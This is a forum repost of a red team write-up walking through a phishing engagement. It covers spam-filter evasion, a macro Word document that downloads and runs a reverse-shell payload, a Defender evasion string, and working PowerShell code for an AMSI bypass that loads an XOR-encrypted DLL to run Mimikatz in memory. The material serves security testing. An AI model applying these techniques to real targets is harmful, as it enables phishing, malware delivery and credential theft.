Login

browneylad

There have been a lot of posts about crafting red team phishing campaigns, and most are incomplete. Today, we're going to walk through one of our recent external engagements from start to initial access, including domain creation, crafting phishing content, considerations for bypassing spam filters and email gateways, generating undetectable payloads, and bypassing Windows protections such as AMSI. We compiled a list of references at the bottom of this post.

Customer names and related information have been anonymized for obvious reasons. Depending on the sophistication and length of your red team engagement, you will need to gauge how much time and effort you spend on each of the items below.

Quote:Deliverability considerations:
Origin of mail:

Sending mail from localhost (e.g. your laptop) using a script.

IP reputation in headers.

Recently commissioned VPS with no sender history.

Sending domain reputation and domain age (amount of time between domain creation and the date of your campaign).

Link reputation and domain age.

Use a high-reputation sender, like Mailchimp or Sendgrid.
Verify your domain with these providers so you can send emails "From:" your domain, opposed to "Delivered-by Mailchimp for XXX".

Match the Return-path for targeted emails.

Configure SPF, DKIM, and DMARC.

Timing & frequency:
If you send 100 emails at once from a low reputation IP, you'll almost certainly get flagged as spam.

Valid SSL certs on sending domains and links in the email.

Broken links.

Amount of HTML content.

Quote:Engagement
We generally approach phishing campaigns in three ways during an engagement:

Targeted campaign against specific individuals of interest.

Mass campaign against all users gleaned from the recon phase. (There are lots of great resources for recon and creating a targetable list of email addresses. Here are a few: OSINT Resources for 2019, theHarvester, datasploit, awesome-osint on Github)

Submission via forms on target company's website, usually by setting up a fake company.

Each campaign uses a different domain so as not to impact the reputation or deliverability of other campaigns. Campaigns should begin from most subtle to most egregious. Should the company recognize they are being targeted, your future attempts could be more heavily scrutinized. We often use Mailchimp for delivery after verifying our domain and setting up email authentication. We've also had success with a G Suite account and SMTP authentication using custom scripts.
Due to time constraints (20 hours), we chose options two and three above. For both campaigns, we used a word doc with macros.
Recon
An MX lookup of our target company showed they were using G Suite, so we could test campaigns against mock G Suite accounts to ensure we'd get through their protections.

Code:
dig target.com MX

Google does a decent job at filtering malicious attachments, so in campaign one we hosted it on a high reputation domain and in campaign two we hosted it on our own domain.
Campaign prep: generating a word doc macro and payload
For this engagement, we used a malicious word doc with macros. We leveraged unicorn (thanks @hackingdave) to generate a powershell macro to download/exec our payload, and made a slight modification to bypass Defender at the time:

Code:
"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "

We used hershell for our payload, an awesome lightweight stage 1 written in Go, whose x86 arch was undetectable at the time. If your payload is getting flagged, you have options for obfuscation and encryption, and can also manually bypass AV signatures if you know your target environment using something like dsplit. Here are some resources:
https://resources.infosecinstitute.com/antivirus-evasion-tools/
https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1
http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html
Metasploit 5 was also recently released with built-in payload encryption and evasionpayloads, but we haven't had a chance to use them.

Quote:AMSI bypass

We anticipated the need to run custom powershell payloads, so we'd have to bypass a recent Windows protection called AMSI. According to Microsoft, AMSI stands for Anti-Malware Scan Interface, and allows for programs (like powershell) to submit content to a scanning engine prior to execution. Credit goes to Cyberark for their initial research into bypassing AMSI, and writeup by Andre Marques. We were able to adapt their implementations, which were getting flagged by Microsoft at the time, to bypass AMSI using XOR encryption.

Code:
1. Re-compile the AMSI Bypass DLL 2. Convert the binary to base64 $base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\\bypass.dll")) 3. XOR encrypt foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 } 4. Print encrypted buf as a byte array foreach($byte in $encrypted){ Write-Host -nonewline "$byte," } On Target 1. Split encrypted buf due to powershell line limit lengths 2. Concat the buf $xorencrypted = $a + $b + $c + $d + $e + $f + $g 3. Decrypt the buf foreach($byte in $xorencrypted){$decrypted += $byte -bxor 1 } 4. Get buf as base64 $base64string = [Text.Encoding]::UTF8.GetString($decrypted) 5. Load the DLL using reflection function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); } 6. Call the bypass method Bypass-AMCEE

This allows us to execute powershell payloads again in memory, such as Mimikatz.

You can grab a working AMSI bypass (as of 02/13/19) here.

Read more in below blog link:
https://blog.sublimesecurity.com/red-tea...-phishing/
AMSI bypass Github link

Login
Username/Email:
Password:	Lost Password?
	Remember me